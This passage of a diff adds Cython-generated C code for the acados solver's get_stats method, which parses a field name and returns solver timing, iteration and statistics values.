+PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats, "\n Get the information of the last solver call.\n\n :param field: string in ['statistics', 'time_tot', 'time_lin', 'time_sim', 'time_sim_ad', 'time_sim_la', 'time_qp', 'time_qp_solver_call', 'time_reg', 'sqp_iter']\n Available fileds:\n - time_tot: total CPU time previous call\n - time_lin: CPU time for linearization\n - time_sim: CPU time for integrator\n - time_sim_ad: CPU time for integrator contribution of external function calls\n - time_sim_la: CPU time for integrator contribution of linear algebra\n - time_qp: CPU time qp solution\n - time_qp_solver_call: CPU time inside qp solver (without converting the QP)\n - time_qp_xcond: time_glob: CPU time globalization\n - time_solution_sensitivities: CPU time for previous call to eval_param_sens\n - time_reg: CPU time regularization\n - sqp_iter: number of SQP iterations\n - qp_iter: vector of QP iterations for last SQP call\n - statistics: table with info about last iteration\n - stat_m: number of rows in statistics matrix\n - stat_n: number of columns in statistics matrix\n - residuals: residuals of last iterate\n - alpha: step sizes of SQP iterations\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats = {"get_stats", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_field_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_stats (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_field_2,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 346, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_stats") < 0)) __PYX_ERR(0, 346, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_field_ = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_stats", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 346, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_stats", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field_); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_) { + PyObject *__pyx_v_double_fields = NULL; + CYTHON_UNUSED PyObject *__pyx_v_fields = NULL; + PyObject *__pyx_v_field = NULL; + PyObject *__pyx_v_sqp_iter = NULL; + PyObject *__pyx_v_stat_m = NULL; + PyObject *__pyx_v_stat_n = NULL; + PyObject *__pyx_v_min_size = NULL; + PyObject *__pyx_v_full_stats = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_stats", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":371 + * """ + * + * double_fields = ['time_tot', # <<<<<<<<<<<<<< + * 'time_lin', + * 'time_sim', + */ + __pyx_t_1 = PyList_New(11); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 371, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_time_tot); + __Pyx_GIVEREF(__pyx_n_u_time_tot); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_time_tot); + __Pyx_INCREF(__pyx_n_u_time_lin); + __Pyx_GIVEREF(__pyx_n_u_time_lin); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_time_lin); + __Pyx_INCREF(__pyx_n_u_time_sim); + __Pyx_GIVEREF(__pyx_n_u_time_sim); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_time_sim); + __Pyx_INCREF(__pyx_n_u_time_sim_ad); + __Pyx_GIVEREF(__pyx_n_u_time_sim_ad); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_time_sim_ad); + __Pyx_INCREF(__pyx_n_u_time_sim_la); + __Pyx_GIVEREF(__pyx_n_u_time_sim_la); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_time_sim_la); + __Pyx_INCREF(__pyx_n_u_time_qp); + __Pyx_GIVEREF(__pyx_n_u_time_qp); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_time_qp); + __Pyx_INCREF(__pyx_n_u_time_qp_solver_call); + __Pyx_GIVEREF(__pyx_n_u_time_qp_solver_call); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_time_qp_solver_call); + __Pyx_INCREF(__pyx_n_u_time_qp_xcond); + __Pyx_GIVEREF(__pyx_n_u_time_qp_xcond); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_time_qp_xcond); + __Pyx_INCREF(__pyx_n_u_time_glob); + __Pyx_GIVEREF(__pyx_n_u_time_glob); + PyList_SET_ITEM(__pyx_t_1, 8, __pyx_n_u_time_glob); + __Pyx_INCREF(__pyx_n_u_time_solution_sensitivities); + __Pyx_GIVEREF(__pyx_n_u_time_solution_sensitivities); + PyList_SET_ITEM(__pyx_t_1, 9, __pyx_n_u_time_solution_sensitivities); + __Pyx_INCREF(__pyx_n_u_time_reg); + __Pyx_GIVEREF(__pyx_n_u_time_reg); + PyList_SET_ITEM(__pyx_t_1, 10, __pyx_n_u_time_reg); + __pyx_v_double_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":383 + * 'time_reg' + * ] + * fields = double_fields + [ # <<<<<<<<<<<<<< + * 'sqp_iter', + * 'qp_iter', + */ + __pyx_t_1 = PyList_New(7); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 383, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_sqp_iter); + __Pyx_GIVEREF(__pyx_n_u_sqp_iter); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_sqp_iter); + __Pyx_INCREF(__pyx_n_u_qp_iter); + __Pyx_GIVEREF(__pyx_n_u_qp_iter); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_qp_iter); + __Pyx_INCREF(__pyx_n_u_statistics); + __Pyx_GIVEREF(__pyx_n_u_statistics); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_statistics); + __Pyx_INCREF(__pyx_n_u_stat_m); + __Pyx_GIVEREF(__pyx_n_u_stat_m); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_stat_m); + __Pyx_INCREF(__pyx_n_u_stat_n); + __Pyx_GIVEREF(__pyx_n_u_stat_n); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_stat_n); + __Pyx_INCREF(__pyx_n_u_residuals); + __Pyx_GIVEREF(__pyx_n_u_residuals); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_residuals); + __Pyx_INCREF(__pyx_n_u_alpha); + __Pyx_GIVEREF(__pyx_n_u_alpha); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_alpha); + __pyx_t_2 = PyNumber_Add(__pyx_v_double_fields, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 383, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_fields = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":392 + * 'alpha', + * ] + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_field_, __pyx_n_s_encode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 392, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_kp_u_utf_8}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 392, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_field = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":394 + * field = field_.encode('utf-8') + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: # <<<<<<<<<<<<<< + * return self.__get_stat_int(field) + * + */ + __Pyx_INCREF(__pyx_v_field_); + __pyx_t_2 = __pyx_v_field_; + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_t_2, __pyx_n_u_sqp_iter, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 394, __pyx_L1_error) + if (!__pyx_t_6) { + } else { + __pyx_t_5 = __pyx_t_6; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_t_2, __pyx_n_u_stat_m, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 394, __pyx_L1_error) + if (!__pyx_t_6) { + } else { + __pyx_t_5 = __pyx_t_6; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_t_2, __pyx_n_u_stat_n, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 394, __pyx_L1_error) + __pyx_t_5 = __pyx_t_6; + __pyx_L4_bool_binop_done:; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_6 = __pyx_t_5; + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":395 + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: + * return self.__get_stat_int(field) # <<<<<<<<<<<<<< + * + * elif field_ in double_fields: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_stat); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 395, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_field}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 395, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":394 + * field = field_.encode('utf-8') + * + * if field_ in ['sqp_iter', 'stat_m', 'stat_n']: # <<<<<<<<<<<<<< + * return self.__get_stat_int(field) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":397 + * return self.__get_stat_int(field) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * return self.__get_stat_double(field) + * + */ + __pyx_t_6 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_double_fields, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 397, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":398 + * + * elif field_ in double_fields: + * return self.__get_stat_double(field) # <<<<<<<<<<<<<< + * + * elif field_ == 'statistics': + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_stat_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 398, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_field}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 398, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":397 + * return self.__get_stat_int(field) + * + * elif field_ in double_fields: # <<<<<<<<<<<<<< + * return self.__get_stat_double(field) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":400 + * return self.__get_stat_double(field) + * + * elif field_ == 'statistics': # <<<<<<<<<<<<<< + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_statistics, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 400, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":401 + * + * elif field_ == 'statistics': + * sqp_iter = self.get_stats("sqp_iter") # <<<<<<<<<<<<<< + * stat_m = self.get_stats("stat_m") + * stat_n = self.get_stats("stat_n") + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_sqp_iter}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 401, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_sqp_iter = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":402 + * elif field_ == 'statistics': + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") # <<<<<<<<<<<<<< + * stat_n = self.get_stats("stat_n") + * min_size = min([stat_m, sqp_iter+1]) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 402, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_stat_m}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 402, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_stat_m = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":403 + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") + * stat_n = self.get_stats("stat_n") # <<<<<<<<<<<<<< + * min_size = min([stat_m, sqp_iter+1]) + * return self.__get_stat_matrix(field, stat_n+1, min_size) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 403, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_stat_n}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 403, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_v_stat_n = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":404 + * stat_m = self.get_stats("stat_m") + * stat_n = self.get_stats("stat_n") + * min_size = min([stat_m, sqp_iter+1]) # <<<<<<<<<<<<<< + * return self.__get_stat_matrix(field, stat_n+1, min_size) + * + */ + __pyx_t_2 = __Pyx_PyInt_AddObjC(__pyx_v_sqp_iter, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 404, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_INCREF(__pyx_v_stat_m); + __pyx_t_1 = __pyx_v_stat_m; + __pyx_t_7 = PyObject_RichCompare(__pyx_t_2, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_7); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 404, __pyx_L1_error) + __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_t_7); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 404, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (__pyx_t_6) { + __Pyx_INCREF(__pyx_t_2); + __pyx_t_3 = __pyx_t_2; + } else { + __Pyx_INCREF(__pyx_t_1); + __pyx_t_3 = __pyx_t_1; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __pyx_t_3; + __Pyx_INCREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_min_size = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":405 + * stat_n = self.get_stats("stat_n") + * min_size = min([stat_m, sqp_iter+1]) + * return self.__get_stat_matrix(field, stat_n+1, min_size) # <<<<<<<<<<<<<< + * + * elif field_ == 'qp_iter': + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_AcadosOcpSolverCython__get_stat_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 405, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyInt_AddObjC(__pyx_v_stat_n, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 405, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[4] = {__pyx_t_7, __pyx_v_field, __pyx_t_1, __pyx_v_min_size}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 405, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":400 + * return self.__get_stat_double(field) + * + * elif field_ == 'statistics': # <<<<<<<<<<<<<< + * sqp_iter = self.get_stats("sqp_iter") + * stat_m = self.get_stats("stat_m") + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":407 + * return self.__get_stat_matrix(field, stat_n+1, min_size) + * + * elif field_ == 'qp_iter': # <<<<<<<<<<<<<< + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_qp_iter, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 407, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":408 + * + * elif field_ == 'qp_iter': + * full_stats = self.get_stats('statistics') # <<<<<<<<<<<<<< + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get_stats); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 408, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_n_u_statistics}; + __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 408, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v_full_stats = __pyx_t_2; + __pyx_t_2 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":409 + * elif field_ == 'qp_iter': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 409, __pyx_L1_error) + if (__pyx_t_6) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":410 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] # <<<<<<<<<<<<<< + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_full_stats, __pyx_tuple__18); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 410, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":409 + * elif field_ == 'qp_iter': + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': # <<<<<<<<<<<<<< + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":411 + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': # <<<<<<<<<<<<<< + * return full_stats[2, :] + * + */ + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP_RTI, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 411, __pyx_L1_error) + if (__pyx_t_6) { + + /* 